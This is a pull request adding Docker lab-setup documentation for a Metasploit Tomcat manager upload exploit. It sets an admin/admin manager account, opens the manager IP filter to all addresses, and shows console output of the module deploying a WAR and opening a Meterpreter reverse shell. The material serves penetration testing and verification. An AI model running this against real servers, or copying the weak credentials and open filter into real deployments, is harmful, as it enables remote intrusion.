### PR TITLE
Add docker documentation for tomcat mgr upload

### DIFF
--- a/documentation/modules/exploit/multi/http/tomcat_mgr_upload.md
+++ b/documentation/modules/exploit/multi/http/tomcat_mgr_upload.md
@@ -5,6 +5,96 @@ This documentation is broken down by OS, Tomcat version, then privilege to show 
 # tomcat_mgr_deploy
 This module is VERY similar to `exploit/multi/http/tomcat_mgr_deploy`, the main difference is this uses a `POST` HTTP request through the GUI, instead of a `PUT` HTTP request.  This module also automatically undeploys (clean up) the malicious app.
 
+## Docker
+
+### tomcat8 (8.5.78)
+
+Create a new `tomcat-users.xml` file with a new `admin` account:
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<tomcat-users xmlns="http://tomcat.apache.org/xml"
+              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
+              version="1.0">
+   <!--
+     By default, no user is included in the "manager-gui" role required
+     to operate the "/manager/html" web application.  If you wish to use this app,
+     you must define such a user - the username and password are arbitrary.
+
+     Built-in Tomcat manager roles:
+       - manager-gui    - allows access to the HTML GUI and the status pages
+       - manager-script - allows access to the HTTP API and the status pages
+       - manager-jmx    - allows access to the JMX proxy and the status pages
+       - manager-status - allows access to the status pages only
+
+     The users below are wrapped in a comment and are therefore ignored. If you
+     wish to configure one or more of these users for use with the manager web
+     application, do not forget to remove the <!.. ..> that surrounds them. You
+     will also need to set the passwords to something appropriate.
+   -->
+    <user username="admin" password="admin" roles="manager-gui"/>
+</tomcat-users>
+```
+
+Create a new `setup.sh` file which will install management apps, and allow remote access:
+
+```sh
+#!/bin/bash
+
+set -euxo pipefail
+
+# Ensure the management apps are enabled by default - https://github.com/docker-library/tomcat/pull/181
+mv ./webapps.dist/* ./webapps;
+
+# Update the IP filter to allow everything. i.e. within './webapps/manager/META-INF/context.xml'
+# Expected before:
+#   <Valve className="org.apache.catalina.valves.RemoteAddrValve"
+#         allow="127\.\d+\.\d+\.\d+|::1|0:0:0:0:0:0:0:1" />
+# Expected after:
+#  <Valve className="org.apache.catalina.valves.RemoteAddrValve"
+#         allow=".*" />
+find webapps -name '*.xml' -exec sed -i "s#allow=\".*\"#allow=\".*\"#" {} +
+
+echo "User configuration:"
+cat ./conf/tomcat-users.xml
+
+echo "Manager configuration:"
+cat ./webapps/manager/META-INF/context.xml
+
+# Run tomcat as normal
+catalina.sh run
+```
+
+Run the Docker process with the configured users and enabling management app:
+```
+docker run \
+   --interactive --tty \
+   --rm \
+   --publish 8888:8080 \
+   --volume $(pwd)/tomcat-users.xml:/usr/local/tomcat/conf/tomcat-users.xml \
+   --volume $(pwd)/setup.sh:/usr/local/tomcat/setup.sh \
+   tomcat:8.5.78-jre8-temurin /bin/bash setup.sh
+```
+
+It should be now be possible to run this module:
+```
+msf6 exploit(multi/http/tomcat_mgr_upload) > use exploit/multi/http/tomcat_mgr_upload
+[*] Using configured payload java/meterpreter/reverse_tcp
+msf6 exploit(multi/http/tomcat_mgr_upload) > run http://admin:admin@127.0.0.1:8888 lhost=192.168.123.1
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] Retrieving session ID and CSRF token...
+[*] Uploading and deploying YzO13d...
+[*] Executing YzO13d...
+[*] Undeploying YzO13d ...
+[*] Sending stage (61456 bytes) to 192.168.123.1
+[*] Undeployed at /manager/html/undeploy
+[*] Meterpreter session 4 opened (192.168.123.1:4444 -> 192.168.123.1:58604 ) at 2022-05-10 16:55:34 +0100
+
+meterpreter >
+```
+
 ## Windows (xp sp2)
 ### Tomcat 6 (6.0.48)
 #### Setup


### PR DESCRIPTION
I was hoping to get some tomcat shells, but it looks like the default docker instance is secure by default.
I've added some documentation for setting up a tomcat environment in docker now as a result

## Verification

Follow the setup steps and acquire a shell